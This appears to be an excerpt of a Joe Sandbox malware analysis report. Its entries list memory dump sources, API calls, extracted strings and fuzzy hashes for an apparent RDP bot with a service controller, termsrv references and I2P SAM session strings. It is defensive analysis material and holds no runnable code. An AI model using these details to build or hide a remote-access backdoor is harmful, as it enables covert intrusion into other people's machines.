                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                      • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                      • API String ID: 2122475568-588975189
                                                      • Opcode ID: a4298e7b122fbae6062e031dd61c21640c8cf46f8bb4e553a12712b4540fc067
                                                      • Instruction ID: 7916308a6a5222c713e3a7e12fb414fbf754c724cdc80604ac2bba68f7506a02
                                                      • Opcode Fuzzy Hash: a4298e7b122fbae6062e031dd61c21640c8cf46f8bb4e553a12712b4540fc067
                                                      • Instruction Fuzzy Hash: 9C515D7AB0AB4A86EB51CF55E46436977A1FB86F44F404435DA4D4736ADF3CE804C704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                      • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                      • API String ID: 2122475568-588975189
                                                      • Opcode ID: 6c0a4d4fc4eafb2a18a36948cfbb7946067a6be85329e86a1acf2c5e9ae14cf3
                                                      • Instruction ID: c2a614e035cf3b85a6bab8ff1fbae6847517e6f60a22366e8b1656e7a7354c09
                                                      • Opcode Fuzzy Hash: 6c0a4d4fc4eafb2a18a36948cfbb7946067a6be85329e86a1acf2c5e9ae14cf3
                                                      • Instruction Fuzzy Hash: 3B516D7AB0AB4A86EB51CF15E46436977A1FB86F44F404435DA4D4336ADF3CE808C704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                      • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                      • API String ID: 2122475568-588975189
                                                      • Opcode ID: 34ca061acf4e3cd6d3fc7e618a7595f8d024dafa0802be9c57e0352fc75bf84d
                                                      • Instruction ID: 08328ff8c49c34f9dab6221290187c58f50fa6fa297dcdbb310cf5242d44dbfb
                                                      • Opcode Fuzzy Hash: 34ca061acf4e3cd6d3fc7e618a7595f8d024dafa0802be9c57e0352fc75bf84d
                                                      • Instruction Fuzzy Hash: 81516D7AB0AB4A86EB52CF15E46436977A1FB86F44F404435DA4D4336ADF3CE804C704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                      • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                      • API String ID: 2122475568-588975189
                                                      • Opcode ID: 406d0f4e3bc12a49c341ef7075332833a598e0fcba5e5b8daee238f18105a43b
                                                      • Instruction ID: 87566361c1a9546bed1f7800615b5717e43d2727d321e1c9b5c62d9e8d57d2a9
                                                      • Opcode Fuzzy Hash: 406d0f4e3bc12a49c341ef7075332833a598e0fcba5e5b8daee238f18105a43b
                                                      • Instruction Fuzzy Hash: 3D516D7AB0AB4A86EB51CF15E46436977A1FB86F44F404435DA4D4336AEF3CE804C704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                                      • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                                      • API String ID: 546114577-3142219161
                                                      • Opcode ID: fb4caca265b0be7313e155c760840d1fa3bc9f678d2bb8049f5f8fcea4102657
                                                      • Instruction ID: d96f2f8dce5c53f6a767c3ab02f17c74875f045216b5a3a17187c8550651902b
                                                      • Opcode Fuzzy Hash: fb4caca265b0be7313e155c760840d1fa3bc9f678d2bb8049f5f8fcea4102657
                                                      • Instruction Fuzzy Hash: 3C41F1B8F0E60FA1FB2A5F50A4F93781260AF17F40F510836C64E463E3AE5EA945870D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                                      • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                      • API String ID: 610085118-1825955162
                                                      • Opcode ID: 16ec5899d4c37e0d2410b5bfc2ab00d0514c7870d851ef3f2ba0803ab40a7034
                                                      • Instruction ID: 9fb662ee387d66a42fdea9aad914ae2b4aecb1096da9f08d482d0c8bd98d0571
                                                      • Opcode Fuzzy Hash: 16ec5899d4c37e0d2410b5bfc2ab00d0514c7870d851ef3f2ba0803ab40a7034
                                                      • Instruction Fuzzy Hash: 46513B31B0BA4AD2EA158B15F86037A6360FF4AF92F110435EA4E437A6DF7DE541C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                      • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                      • API String ID: 1721699506-2819899730
                                                      • Opcode ID: 10e75d5b59e40a2193b1b9d0a34103648fe9de92aec31d16d2012405010df0ab
                                                      • Instruction ID: 044719ae2caaaeb608be579f7f2a844c0508da59e7a073de224c8202eaaa8708
                                                      • Opcode Fuzzy Hash: 10e75d5b59e40a2193b1b9d0a34103648fe9de92aec31d16d2012405010df0ab
                                                      • Instruction Fuzzy Hash: 8A614FE1E0C59785FA24BB54FC40BB8A255AF80398FD54132E90F8759DDF3CEA868361
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$CompareCriticalEnterFileSectionTime
                                                      • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                                      • API String ID: 3718746087-844192579
                                                      • Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
                                                      • Instruction ID: e01c91c0d850d4620b15b8d2ce52bc628b1a7eea14f4368a29180dad8f852d5a
                                                      • Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
                                                      • Instruction Fuzzy Hash: E7511819B0D68B81FB239F21A9783BA52919F86FC4F440431DB4D4B7CBEE6EE9058704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
                                                      • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                                      • API String ID: 2654219296-2700516951
                                                      • Opcode ID: 4387c822a17933dfd982bf28bb151515e8fb8fbc64b75f917438ce9af074396c
                                                      • Instruction ID: 371a352af450154d6938b1aea7cdac88f5599a2ed314f6a29f20fee54aa19d92
                                                      • Opcode Fuzzy Hash: 4387c822a17933dfd982bf28bb151515e8fb8fbc64b75f917438ce9af074396c
                                                      • Instruction Fuzzy Hash: 91411F21B0BA4E83EF544F11E8703796260BF4AF66F190635CA2E463E6DF7DE9408359
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: strcpystrlen$strcmp
                                                      • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                                      • API String ID: 245486318-5999096
                                                      • Opcode ID: 38634489d7978dd11fad982d5f88a49f981e2d6265108d12591518f39eb3f4f8
                                                      • Instruction ID: 3a76f54681f86be0fe2d73fab76598b3dc3c685df219291e60cae735b342f5e0
                                                      • Opcode Fuzzy Hash: 38634489d7978dd11fad982d5f88a49f981e2d6265108d12591518f39eb3f4f8
                                                      • Instruction Fuzzy Hash: 8871412BB0FA4281FA52972594703792290AF417F8F544332DDBE177D7DE2CE802834A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                                      • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                                      • API String ID: 3562457520-1478336053
                                                      • Opcode ID: 91ed3e22107f3558c2c95dbba1a74d6c6945766dbd2abe62acd9c7db1e06b2d5
                                                      • Instruction ID: f24b573bf0a6ef767a176357610bf8c2fc73215fc7ac2dd0dbe997a1356587f8
                                                      • Opcode Fuzzy Hash: 91ed3e22107f3558c2c95dbba1a74d6c6945766dbd2abe62acd9c7db1e06b2d5
                                                      • Instruction Fuzzy Hash: 8851F6D0E0C60782FB607B90BC90BBDA1909F15768FD40136D61F0A5EAEF5DA98593B1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                                      • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                                      • API String ID: 1135201459-1870638116
                                                      • Opcode ID: 64ec105accf7e70dacae6fe03fe56eb3cbb995caed75091f8dc94bed95c71e06
                                                      • Instruction ID: 08527c86223dab19f8a191ef446b3bd7dd660ac64ac7ca0c5199f28bc1a95530
                                                      • Opcode Fuzzy Hash: 64ec105accf7e70dacae6fe03fe56eb3cbb995caed75091f8dc94bed95c71e06
                                                      • Instruction Fuzzy Hash: C431C397B0BA4685FA92AF52E8603B96390BF85BE4F484035DD5E07397EE2CE505C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocFreestrcpystrlen
                                                      • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                                      • API String ID: 925994320-1558387473
                                                      • Opcode ID: 9a6b8e21f566bbe8435919b3e5def1b32568444d3476a2dad9c2200182573ace
                                                      • Instruction ID: 645848d7c5e033d5824c30d435de2cb431dc91122a328f3947332f236b81e4a5
                                                      • Opcode Fuzzy Hash: 9a6b8e21f566bbe8435919b3e5def1b32568444d3476a2dad9c2200182573ace
                                                      • Instruction Fuzzy Hash: AC41B269B0E64B85E6426F16D8683792BA1EF46F94F440834ED1E07393EF3CE445C718
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen
                                                      • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                      • API String ID: 39653677-3302659514
                                                      • Opcode ID: 36219663468fdaef4b68b41003626b1b3e46fca3c279ed0071ccb873fe8e22c8
                                                      • Instruction ID: 867d07f2ae0ecbdd10c99a986292ba400d1da1c2599e0417a2f5bea9f7507116
                                                      • Opcode Fuzzy Hash: 36219663468fdaef4b68b41003626b1b3e46fca3c279ed0071ccb873fe8e22c8
                                                      • Instruction Fuzzy Hash: E44141D1A0CA5791FA65BB14FC50BB9E761AF40788FC44232E64F4769DDF3CA9068360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                                      • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                                      • API String ID: 2278979430-4175654481
                                                      • Opcode ID: b62926433ff0ffdebe13f9ef1776f7045121dba30f513e78472fdd0571286397
                                                      • Instruction ID: ef32885ff42002adcd13ea4a09460eec3098eae7344c4e9f562d0484c35e91d7
                                                      • Opcode Fuzzy Hash: b62926433ff0ffdebe13f9ef1776f7045121dba30f513e78472fdd0571286397
                                                      • Instruction Fuzzy Hash: 2751D332B0A68E86EB204B15E460379B250AF42FB6F144731EA7D07BD7DF7E94418704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                      • API String ID: 1004003707-636894343
                                                      • Opcode ID: 78d3a37ad1a2723e121ff0d4f19c21effae94ffce4a1e9da8ce3ba05e3596c26
                                                      • Instruction ID: 8c92a8668e1662f5686d93dc42ea0a0c65e4aab396af91dd3e5427928c746a7b
                                                      • Opcode Fuzzy Hash: 78d3a37ad1a2723e121ff0d4f19c21effae94ffce4a1e9da8ce3ba05e3596c26
                                                      • Instruction Fuzzy Hash: A441487BB1A68FE1FA16CF01E8203B92260BB16B48F454132EA5C46397DF3CE556C348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: strcmp
